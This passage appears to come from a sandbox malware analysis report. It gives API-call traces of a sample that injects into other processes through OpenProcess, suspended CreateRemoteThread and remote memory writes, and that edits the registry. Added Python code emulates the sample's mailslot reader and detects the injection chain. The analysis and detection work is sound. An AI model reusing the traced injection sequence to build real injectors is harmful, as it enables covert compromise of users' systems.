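FakeMailslot, frame() and the max_polls / max_bytes guards are constructed for
this example.
"""
from collections import deque

CHUNK = 0x1000               # nMaxMessageSize of the mailslot and the ReadFile size
ERROR_SEM_TIMEOUT = 0x79     # ReadFile result with lReadTimeout == 0 and an empty slot
ERROR_NOT_ENOUGH_MEMORY = 8  # what the loop reports when HeapReAlloc fails


class MailslotError(Exception):
    def __init__(self, code):
        super().__init__(f"ReadFile failed with Win32 error {code:#x}")
        self.code = code


class FakeMailslot:
    """In-memory stand-in for the kernel object (constructed for this example).

    Queue entries are bytes (one message each, at most CHUNK bytes) or an int,
    which is raised as that Win32 error code by the read that reaches it.
    """

    def __init__(self, entries, empty_polls_before_data=0):
        self.queue = deque(entries)
        self.empty_polls = empty_polls_before_data
        self.reads = 0

    def read(self, max_len):
        self.reads += 1
        if self.empty_polls > 0:        # nothing queued yet: a zero-timeout read fails
            self.empty_polls -= 1
            raise MailslotError(ERROR_SEM_TIMEOUT)
        if not self.queue:
            raise MailslotError(ERROR_SEM_TIMEOUT)
        entry = self.queue.popleft()
        if isinstance(entry, int):
            raise MailslotError(entry)
        if len(entry) > max_len:
            raise ValueError("message larger than nMaxMessageSize")
        return entry


def frame(payload):
    """Sender-side framing the receive loop implies: full CHUNK-sized messages,
    then a short terminator (an empty message when len(payload) is a multiple
    of CHUNK; without it the receiver would poll forever)."""
    msgs = [payload[i:i + CHUNK] for i in range(0, len(payload), CHUNK)]
    if not msgs or len(msgs[-1]) == CHUNK:
        msgs.append(b"")
    return msgs


def receive(slot, max_polls=None, max_bytes=None):
    """Replays E00401033: returns (status, data); status 0 means data is complete.

    max_polls and max_bytes are guards added here; the original polls without
    limit and grows the buffer until HeapReAlloc fails.
    """
    buf = bytearray()
    alloc = CHUNK            # E004011F2(0x1000): the first heap block
    status = 0
    polls = 0
    while True:
        try:
            chunk = slot.read(CHUNK)
        except MailslotError as err:
            status = err.code
            if err.code != ERROR_SEM_TIMEOUT:
                break                          # any other error ends the receive with that code
            got = CHUNK                        # _v16 = 0x1000 keeps the loop condition true
            polls += 1
            if max_polls is not None and polls > max_polls:
                break                          # added guard, not in the original
        else:
            buf += chunk                       # appended at offset _t39
            got = len(chunk)
            alloc += CHUNK                     # _v12 += 0x1000 before HeapReAlloc
            if max_bytes is not None and alloc > max_bytes:
                status = ERROR_NOT_ENOUGH_MEMORY   # the HeapReAlloc failure path (L10)
                break
            status = 0                         # _v8 &= 0: a successful read clears an earlier timeout
        # Sleep(0x64) in the original: 100 ms between polls
        if got != CHUNK:
            break                              # short message: end of transfer
    return status, bytes(buf)


if __name__ == "__main__":
    payload = bytes(range(256)) * 40           # 0x2800 bytes of constructed sample data
    status, data = receive(FakeMailslot(frame(payload), empty_polls_before_data=3))
    print(hex(status), len(data), data == payload)
```

The two guards matter for anyone reusing the pattern defensively: the sample's loop has no upper bound on polls or on buffer size, so a sender that never finishes a transfer keeps the thread spinning and a sender that keeps writing full chunks drives the heap block up until HeapReAlloc fails.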
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
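The two function summaries above (ResumeThread and SuspendThread around VirtualProtectEx and NtWriteVirtualMemory in the subcalls, then OpenProcess with 001F0FFF followed by CreateRemoteThread with creation flags 00000004) are the raw material for a detection rule. The script below is an added example and not part of the Joe Sandbox report: it parses API lines in the report's own format, decodes the OpenProcess access mask and the CreateRemoteThread flags, recognises the CCCCFEEB argument as the little-endian encoding of EB FE (a two-byte jmp to itself, the stub typically parked at a thread's entry so it idles until the real code has been written), and returns the chain as evidence keyed by the report's ref addresses. The sample lines are copied from the summaries above; the parser, the rights table, the rule and all function names are this example's own.

```python
"""Flag a remote-thread injection chain from Joe Sandbox 'APIs' lines.

Added example, not Joe Sandbox code. REPORT_LINES is copied from the function
summaries in this report; the parser, the rights table and the rule are this
example's own.
"""
import re
from dataclasses import dataclass

# Constructed sample input: API lines as printed in the report above.
REPORT_LINES = """
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E3E27: NtWriteVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,002E6114,?,002E1A67,?,00000004,002E24C1,00000004,?), ref: 002E3E45
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
  • GetLastError.KERNEL32 ref: 004010D6
"""

# One report line: optional "Part of subcall function X:", Name.MODULE, optional (args), ref: ADDR
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Process access rights from winnt.h; STANDARD_RIGHTS_REQUIRED is a four-bit group.
PROCESS_RIGHTS = {
    0x0001: "PROCESS_TERMINATE", 0x0002: "PROCESS_CREATE_THREAD",
    0x0004: "PROCESS_SET_SESSIONID", 0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ", 0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE", 0x0080: "PROCESS_CREATE_PROCESS",
    0x0100: "PROCESS_SET_QUOTA", 0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION", 0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x000F0000: "STANDARD_RIGHTS_REQUIRED", 0x00100000: "SYNCHRONIZE",
}
CREATE_SUSPENDED = 0x4
PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    caller: str = ""     # set for "Part of subcall function" entries


def parse_api_lines(text):
    calls = []
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            calls.append(ApiCall(m["name"], m["module"], args, m["ref"].upper(), m["caller"] or ""))
    return calls


def hexarg(arg):
    try:                       # report arguments are hex dwords; '?' and strings give None
        return int(arg, 16)
    except ValueError:
        return None


def decode_access(mask):
    if mask == 0x1F0FFF:       # PROCESS_ALL_ACCESS as defined for pre-Vista SDK targets
        return ["PROCESS_ALL_ACCESS"]
    names, rest = [], mask
    for bit, name in sorted(PROCESS_RIGHTS.items()):
        if rest & bit == bit:
            names.append(name)
            rest &= ~bit
    if rest:
        names.append(f"0x{rest:X}")
    return names


def is_self_loop_stub(arg):
    """True when the dword's first two bytes in memory are EB FE (jmp to itself)."""
    value = hexarg(arg)
    if value is None or value > 0xFFFFFFFF:
        return False
    return value.to_bytes(4, "little")[:2] == b"\xeb\xfe"


def detect_injection(calls):
    """Collects evidence for OpenProcess -> remote write -> remote thread, keyed by report ref."""
    found = {}
    needed = {"PROCESS_VM_WRITE", "PROCESS_VM_OPERATION", "PROCESS_CREATE_THREAD"}
    for c in calls:
        if c.name == "OpenProcess" and c.args:
            rights = decode_access(hexarg(c.args[0]) or 0)
            if "PROCESS_ALL_ACCESS" in rights or needed <= set(rights):
                found["open_process"] = (c.ref, rights)
        elif c.name in ("NtWriteVirtualMemory", "WriteProcessMemory"):
            found["remote_write"] = c.ref
        elif c.name == "VirtualProtectEx" and len(c.args) > 3:
            if hexarg(c.args[3]) == PAGE_EXECUTE_READWRITE:      # flNewProtect
                found["rwx_protect"] = c.ref
        elif c.name == "CreateRemoteThread" and len(c.args) > 5:
            flags = hexarg(c.args[5])                            # dwCreationFlags
            found["remote_thread"] = (c.ref, flags is not None and bool(flags & CREATE_SUSPENDED))
        if any(is_self_loop_stub(a) for a in c.args):
            found.setdefault("self_loop_stub", c.ref)            # first sighting wins
    return found


def verdict(found):
    core = {"open_process", "remote_write", "remote_thread"}
    return "remote-thread injection" if core.issubset(found) else "no injection chain"


if __name__ == "__main__":
    evidence = detect_injection(parse_api_lines(REPORT_LINES))
    for key, value in evidence.items():
        print(f"{key:16} {value}")
    print(verdict(evidence))
```

The rule is deliberately keyed on the report's ref addresses rather than on call order, because the summaries list calls per function, not in execution order; a suspended remote thread plus an EB FE stub is the hint that the thread is parked first and repointed later, which is why the script reports both separately instead of folding them into one flag.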
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
    • Part of subcall function 002E3C8B: GetModuleFileNameA.KERNELBASE(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB9
    • Part of subcall function 002E3C8B: GetLastError.KERNEL32(?,?,002E2A88,?,00000001,002E618C,0000000C,00000000,?,?,?,002E17BE), ref: 002E3CF7
    • Part of subcall function 002E48FB: lstrcmp.KERNEL32(?,002E7494), ref: 002E49A8
    • Part of subcall function 002E48FB: lstrlen.KERNEL32(?,00000000,00000000,002E1852), ref: 002E49B3
  • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 002E33BB
  • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,002E1BAF,002E8451), ref: 002E33CD
  • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 002E33E5
  • CloseHandle.KERNEL32(?), ref: 002E3400
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 141
  • API ID: ExitThreadGetLastErrorGetModuleHandleHeapCreate
  • String ID:
  • API String ID: 1629895477-0
  • Opcode ID: 3346d6f2501fa6e0feb3b6aa12f6673d7b3f00fa5b3f967e9b051ebee9392a59
  • Instruction ID: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
  • Opcode Fuzzy Hash: 3EB09250504A0380E05CBAE1780035312873B92346D2C852003C330A07C34130A80E44
  • Instruction Fuzzy Hash: e8713d3dc0698a6a8bb7c905658f1a1c6b84964cde7fdefe521c6c0259fcc8dc
C-Code - Quality: 100%
			_entry_() {
				void* _t2;
				long _t3;
				long _t4;

				_t4 = GetModuleHandleA(0); // executed; handle of the module's own image, passed on to the worker setup
				_t2 = HeapCreate(0, 0x10000, 0); // executed; private heap, 0x10000 initial size, growable (maximum 0)
				if(_t2 == 0) {
					_t3 = GetLastError();
				} else {
					_t3 = E00401639(_t2, _t4); // executed; starts the two worker threads (entry points 00401034, inside the mailslot reader E00401033, and 004010FB), waits on them and returns a status, see the subcall list below
				}
				ExitThread(_t3); // ends only the calling thread, with that status as its exit code
			}
(Per-line instruction address column for _entry_ above, covering 0x00401012 to 0x0040102D, omitted here.)

APIs
  • GetModuleHandleA.KERNEL32(00000000), ref: 00401003
  • HeapCreate.KERNELBASE(00000000,00010000,00000000), ref: 00401014
  • GetLastError.KERNEL32 ref: 00401026
  • ExitThread.KERNEL32 ref: 0040102D
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,00401034,?,00000000,?), ref: 0040166E
    • Part of subcall function 00401639: CreateThread.KERNEL32(00000000,00000000,004010FB,?,00000000,?), ref: 0040168C
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004016A3
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(00000000,?,?,?,00000000), ref: 004016B0
    • Part of subcall function 00401639: WaitForSingleObject.KERNEL32(?,000000FF), ref: 004016C0
    • Part of subcall function 00401639: GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401639: TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 004016F0
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
    • Part of subcall function 00401639: CloseHandle.KERNEL32(?), ref: 00401704
    • Part of subcall function 00401639: GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 157
  • API ID: HeapFree
  • String ID: Local\
  • API String ID: 2968971433-422136742
  • Opcode ID: 61488c984085a4f122944a9e8d254705a555d96723ee699a890829b662474710
  • Instruction ID: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
  • Opcode Fuzzy Hash: DFE02C01219EB1CFC4272014EE2813781B8FB1082A8CDB37443C00A2F2EE2825336E0B
  • Instruction Fuzzy Hash: 1190ac8c8153efc7fbe18480ed835a142fa9a419ba70fc421a6de9198c64d95a
APIs
    • Part of subcall function 002E45C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 002E4610
    • Part of subcall function 002E475C: lstrlen.KERNEL32(002E618C,00000000,?,00000027,002E618C,00000000,00000000,002E822E,00000000,?,002E618C,00000000,00000000), ref: 002E4792
    • Part of subcall function 002E475C: lstrcpy.KERNEL32(00000000,00000000), ref: 002E47B6
    • Part of subcall function 002E475C: lstrcat.KERNEL32(00000000,00000000), ref: 002E47BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 002E1217
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: e1752541d73a16271eeb0a7262a47e2e067e5139649c82f5e8bd71f01fb1fcfd
  • Instruction ID: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
  • Opcode Fuzzy Hash: 28D02E858E0880DB9D3B8808E04072682C22C2830218C78164A0A317226F20318FFF2D
  • Instruction Fuzzy Hash: 7ef3357a5521eb77bbf90f27709a0b2fe94b571aa2e597432c6d8f6d1a89cec9
APIs
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetCurrentThreadId.KERNEL32(?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,002E4C06,?,002E74BC,00000000,002E2D09,00000750), ref: 002E4BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 002E4BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 002E4BD9
  • lstrcpy.KERNEL32(00000000), ref: 002E4BE0
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 305
  • API ID: CreateEventGetCurrentProcessIdGetVersionOpenProcess
  • String ID:
  • API String ID: 4193297829-0
